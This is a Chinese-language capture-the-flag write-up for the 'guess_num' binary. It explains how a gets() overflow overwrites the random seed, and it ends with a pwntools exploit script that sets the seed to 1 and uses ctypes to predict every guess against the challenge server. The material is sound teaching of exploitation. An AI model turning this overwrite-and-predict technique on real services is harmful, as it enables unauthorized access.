文件下载地址:
链接:https://pan.baidu.com/s/13uowRQszM6GRvKMEYGG16g
提取码:le64
目录
0x01.分析
checksec:
64位程序,这,好像不太友好,全部保护措施全部开启,暂时无法直接使用栈溢出。
查看源码:
流程大概是,先要输入名字,然后开始猜数,有一次猜错就退出程序,必须每次猜对,然后进入sub函数,拿到flag。
突破点肯定是v7,只有这里使用了gets函数,虽然不可以栈溢出,但是可以覆盖,查看一下v7:
发现随机数种子就在下方,申请的空间是30h,到seed的距离是20h,可以覆盖,那么如何具体覆盖这个seed呢,由于每次都要猜对,所以肯定要替换这个种子,然后之后就按照对应的种子把数数出来就行了,这个种子是C语言里面的函数,我们使用python写脚本,于是自然想到了python和C语言的混合编程,可以使用python的内置函数ctypes。
0x02.重点
- 我们使用python标准库中自带的ctypes模块进行python和c的混合编程。
- 目的是使用libc中的共享库,来获取相应种子的随机数值。
- srand()是随机数种子
- rand()是随机数,如果未设随机数种子,rand()在调用时会自动设随机数种子为1。
libc共享库的查找:
可以用ldd命令查找,也可以在脚本中通过elf文件查找。
elf = ELF('./guess_num')
libc = elf.libc
- 这样我们只需要将种子覆盖为1,然后调用C语言的libc共享库,得到这个种子产生的随机值,就能够保证每次猜对了。
0x03:exp
##!/usr/bin/env python
from pwn import*
from ctypes import*
r=remote("111.198.29.45",31410)
#r=process('./guess_num')
libc=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
payload=0x20*'A'+p64(1)
r.recvuntil("name:")
r.sendline(payload)
libc.srand(1)
for i in range(0,10):
num=str(libc.rand()%6+1)
r.recvuntil("number:")
r.sendline(num)
r.interactive()
